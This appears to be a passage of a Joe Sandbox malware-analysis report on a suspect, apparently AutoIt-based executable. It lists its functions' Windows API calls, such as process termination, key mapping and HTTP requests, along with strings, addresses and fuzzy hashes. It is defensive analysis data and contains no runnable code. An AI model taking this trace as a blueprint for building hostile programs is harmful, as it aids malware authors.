                                • StrokePath.GDI32(00000000), ref: 00CCEA44
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                • String ID:
                                • API String ID: 43455801-0
                                • Opcode ID: 8237018503f0b8bc0963cd71b209be630eb911b7c5e6518d1297d2ce750fbc1a
                                • Instruction ID: 9f0a420cee940475f792407de417bcec26c4bd8872d3ce7bf89002235f350f71
                                • Opcode Fuzzy Hash: 8237018503f0b8bc0963cd71b209be630eb911b7c5e6518d1297d2ce750fbc1a
                                • Instruction Fuzzy Hash: B411DB7600014DBFDF129F90DC88F9A7FADEB08364F048016FE1A99160D7719E56DBA0
                                Function 00C9EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 00C9EFB6
                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C9EFC7
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C9EFCE
                                • ReleaseDC.USER32(00000000,00000000), ref: 00C9EFD6
                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C9EFED
                                • MulDiv.KERNEL32(000009EC,?,?), ref: 00C9EFFF
                                  • Part of subcall function 00C9A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00C9A79D,00000000,00000000,?,00C9AB73), ref: 00C9B2CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CapsDevice$ExceptionRaiseRelease
                                • String ID:
                                • API String ID: 603618608-0
                                • Opcode ID: e7f56d55d59147720b39b4fcb281d8197b1bbb5c6891fc8ae95c3566998f53da
                                • Instruction ID: d9f5f18fcb48252dcf7a13d156264e4bd04740ad19cc2d9c9600098dcb708a76
                                • Opcode Fuzzy Hash: e7f56d55d59147720b39b4fcb281d8197b1bbb5c6891fc8ae95c3566998f53da
                                • Instruction Fuzzy Hash: D901A7B5A00355BFEF109BE59C49B5EBFB8EB48351F004066FE05AB280D6719D00CF61
                                Function 00C887D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                Download Yara Rule
                                APIs
                                • __init_pointers.LIBCMT ref: 00C887D7
                                  • Part of subcall function 00C81E5A: __initp_misc_winsig.LIBCMT ref: 00C81E7E
                                  • Part of subcall function 00C81E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C88BE1
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C88BF5
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C88C08
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C88C1B
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C88C2E
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C88C41
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C88C54
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C88C67
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C88C7A
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C88C8D
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C88CA0
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C88CB3
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C88CC6
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C88CD9
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C88CEC
                                  • Part of subcall function 00C81E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00C88CFF
                                • __mtinitlocks.LIBCMT ref: 00C887DC
                                  • Part of subcall function 00C88AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00D1AC68,00000FA0,?,?,00C887E1,00C86AFA,00D167D8,00000014), ref: 00C88AD1
                                • __mtterm.LIBCMT ref: 00C887E5
                                  • Part of subcall function 00C8884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C887EA,00C86AFA,00D167D8,00000014), ref: 00C889CF
                                  • Part of subcall function 00C8884D: _free.LIBCMT ref: 00C889D6
                                  • Part of subcall function 00C8884D: DeleteCriticalSection.KERNEL32(00D1AC68,?,?,00C887EA,00C86AFA,00D167D8,00000014), ref: 00C889F8
                                • __calloc_crt.LIBCMT ref: 00C8880A
                                • GetCurrentThreadId.KERNEL32 ref: 00C88833
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                • String ID:
                                • API String ID: 2942034483-0
                                • Opcode ID: 4e80e319c28d53471477567944fb905df575710c333e51894c5a16a15e22f8d3
                                • Instruction ID: 95966eef5b58ddb43b8a3c1a5b5b156d93365a3f20909ca4dc4e747925325f7f
                                • Opcode Fuzzy Hash: 4e80e319c28d53471477567944fb905df575710c333e51894c5a16a15e22f8d3
                                • Instruction Fuzzy Hash: BBF090321597516AE2247B787C0768B27D48F0273CBE04A2AF460D58D2FF10884A67AC
                                Function 00CAA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 1423608774-0
                                • Opcode ID: e04e7a697ca9174a8babf1ac4e98d5d312f838da41d14c4676c188ab920192bd
                                • Instruction ID: d391a44c2043a2095da0f60da88fd7ff33c5b96d7a7247c0ca8cc51ebd770fcb
                                • Opcode Fuzzy Hash: e04e7a697ca9174a8babf1ac4e98d5d312f838da41d14c4676c188ab920192bd
                                • Instruction Fuzzy Hash: FF01A9321026529BDB156B54ED88FEF7775FF4A7167000529F6039A0B1CB75ED00DB51
                                Function 00C61867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C61898
                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C618A0
                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C618AB
                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C618B6
                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C618BE
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C618C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Virtual
                                • String ID:
                                • API String ID: 4278518827-0
                                • Opcode ID: 251fb315e0266c4fafe66fb333f94d800ba399924932fa43f40b965328245f1b
                                • Instruction ID: 45e3d09caca1eba454c58711ba583ab425bff0513909837d1b85df97def0f039
                                • Opcode Fuzzy Hash: 251fb315e0266c4fafe66fb333f94d800ba399924932fa43f40b965328245f1b
                                • Instruction Fuzzy Hash: BC0167B0902B5ABDE3008F6A8C85B56FFB8FF19354F04411BA15C4BA42C7F5A864CBE5
                                Function 00CA84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CA8504
                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CA851A
                                • GetWindowThreadProcessId.USER32(?,?), ref: 00CA8529
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA8538
                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA8542
                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA8549
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                • String ID:
                                • API String ID: 839392675-0
                                • Opcode ID: 677d4736c266828701fa282067224d42c50e9fbe895676a81e48324b024e5739
                                • Instruction ID: cbaec1b1e855f314134b345c149eac68074d445a86fa5d6855eea528d0b756ff
                                • Opcode Fuzzy Hash: 677d4736c266828701fa282067224d42c50e9fbe895676a81e48324b024e5739
                                • Instruction Fuzzy Hash: 28F03072640199BFE7215B529D4EFEF7A7CDFC6B15F000058FA0695050D7A06A01D6B5
                                Function 00CAA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(?,?), ref: 00CAA330
                                • EnterCriticalSection.KERNEL32(?,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA341
                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA34E
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA35B
                                  • Part of subcall function 00CA9CCE: CloseHandle.KERNEL32(?,?,00CAA368,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CA9CD8
                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CAA36E
                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00CD66D3,?,?,?,?,?,00C6E681), ref: 00CAA375
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                • String ID:
                                • API String ID: 3495660284-0
                                • Opcode ID: 99b3f3a1f64a1ecd736ba14c8dc0136050e91d852224699249c513d660ad2479
                                • Instruction ID: c9602bcd9d6966970bd4f791d1db141a3ea043b5b87d6e5b391c0e0159306c06
                                • Opcode Fuzzy Hash: 99b3f3a1f64a1ecd736ba14c8dc0136050e91d852224699249c513d660ad2479
                                • Instruction Fuzzy Hash: 54F05E32141252ABD7112B64ED88FDF7B79EF8A312B000521F203990B1CBB59D01DB51
                                Function 00C7D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00C6BBD9: _memmove.LIBCMT ref: 00C6BC33
                                • __swprintf.LIBCMT ref: 00C7D98F
                                Strings
                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C7D832
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                • API String ID: 1943609520-557222456
                                • Opcode ID: 75a16370ff8e2df0978c794a6c04487672b5a59de9b6471f1495e146c03a36c6
                                • Instruction ID: a05e7764bdde2e9ad24743c9fc274306b6d6dc3d07e49a2029cd508411d26305
                                • Opcode Fuzzy Hash: 75a16370ff8e2df0978c794a6c04487672b5a59de9b6471f1495e146c03a36c6
                                • Instruction Fuzzy Hash: 29916B31518301AFC724EF24C885D6EB7B4FF95710F10495EF69A972A1EB20EE44EB52
                                Function 00CBB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 00CBB4A8
                                • CharUpperBuffW.USER32(?,?), ref: 00CBB5B7
                                • VariantClear.OLEAUT32(?), ref: 00CBB73A
                                  • Part of subcall function 00CAA6F6: VariantInit.OLEAUT32(00000000), ref: 00CAA736
                                  • Part of subcall function 00CAA6F6: VariantCopy.OLEAUT32(?,?), ref: 00CAA73F
                                  • Part of subcall function 00CAA6F6: VariantClear.OLEAUT32(?), ref: 00CAA74B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                • API String ID: 4237274167-1221869570
                                • Opcode ID: 827541e04dfdfa320d3d3b59a59effdcafca04578fc6d8a262b297a35c23a462
                                • Instruction ID: 7e09108c7044cdf96e04524ea3ee30cdf95d2c3b6a27c920d4bb301fa427190b
                                • Opcode Fuzzy Hash: 827541e04dfdfa320d3d3b59a59effdcafca04578fc6d8a262b297a35c23a462
                                • Instruction Fuzzy Hash: AC918C706083019FCB14DF28C48499ABBE4AF89714F14496DF89A9B361DB70ED49DB52
                                Function 00CA1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CA10B8
                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CA10EE
                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CA10FF
                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CA1181
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorMode$AddressCreateInstanceProc
                                • String ID: DllGetClassObject
                                • API String ID: 753597075-1075368562
                                • Opcode ID: 3c11314a82ac7c38f5b0f6e94928a446a240c42f9350fc3c0bd2d61079e86fb3
                                • Instruction ID: 10c7f1355cd141ca9212aa59e00af7559341ca8d6c80fb739290fc8a0458eceb
                                • Opcode Fuzzy Hash: 3c11314a82ac7c38f5b0f6e94928a446a240c42f9350fc3c0bd2d61079e86fb3
                                • Instruction Fuzzy Hash: 26415C71600205AFDB15CF55C884B9E7BA9EF46358F1880A9EE059F206D7B1DA44CBA0
                                Function 00CA5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CA5A93
                                • GetMenuItemInfoW.USER32 ref: 00CA5AAF
                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00CA5AF5
                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D218F0,00000000), ref: 00CA5B3E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Menu$Delete$InfoItem_memset
                                • String ID: 0
                                • API String ID: 1173514356-4108050209
                                • Opcode ID: 1fac7cc1107aae28ee97c82a3659c7b66295100c93c02932c9c07e2070f3304e
                                • Instruction ID: c62231d6707c5d211c2377740ca6a8341aa6ad180ef3e1f2b7b1238fcbd9995e
                                • Opcode Fuzzy Hash: 1fac7cc1107aae28ee97c82a3659c7b66295100c93c02932c9c07e2070f3304e
                                • Instruction Fuzzy Hash: 4F41B4712047429FDB20DF24D884F6AB7E4EF8A329F04865DF9A59B2D1D770E900DB62
                                Function 00CC0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00CC0478
                                  • Part of subcall function 00C67F40: _memmove.LIBCMT ref: 00C67F8F
                                  • Part of subcall function 00C6A2FB: _memmove.LIBCMT ref: 00C6A33D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove$BuffCharLower
                                • String ID: cdecl$none$stdcall$winapi
                                • API String ID: 2411302734-567219261
                                • Opcode ID: 7049a44ed160fa4ea179ef664f6d62c5ceac45a18c82fd36e6a2727d1f9af45c
                                • Instruction ID: b32eda04da1ec1baa05c0bcb9721e6d4f6c4896b8cb5e6af0636617260801d1f
                                • Opcode Fuzzy Hash: 7049a44ed160fa4ea179ef664f6d62c5ceac45a18c82fd36e6a2727d1f9af45c
                                • Instruction Fuzzy Hash: CE31C174500619EFCF10DF58C880AEEB3B5FF19310B208A2DE466A72D2DB31EA45DB50
                                Function 00C9C600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C9C684
                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C9C697
                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C9C6C7
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$_memmove
                                • String ID: ComboBox$ListBox
                                • API String ID: 458670788-1403004172
                                • Opcode ID: 5feb10b15dc6d95449647250053b2da3d411a2d4b6408203d3a744926eb040cb
                                • Instruction ID: 0da486f74238ab69c937cd8a6995c4b755df981e20b25b9a9013160b741e2cf4
                                • Opcode Fuzzy Hash: 5feb10b15dc6d95449647250053b2da3d411a2d4b6408203d3a744926eb040cb
                                • Instruction Fuzzy Hash: D821F372900108BFDB14ABA4D8CADFFB7A8DF06314B244619F422E71E1DB754D0AA760
                                Function 00CB4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CB4A60
                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CB4A86
                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CB4AB6
                                • InternetCloseHandle.WININET(00000000), ref: 00CB4AFD
                                  • Part of subcall function 00CB56A9: GetLastError.KERNEL32(?,?,00CB4A2B,00000000,00000000,00000001), ref: 00CB56BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                • String ID:
                                • API String ID: 1951874230-3916222277
                                • Opcode ID: 226d6499946d6a3ae05cec0445295e925fd571411818b74f30d4d6c20f55611a
                                • Instruction ID: 8e5ff840ce428a286389faf947e93f52146a19167c5395fd8419653a41caa530
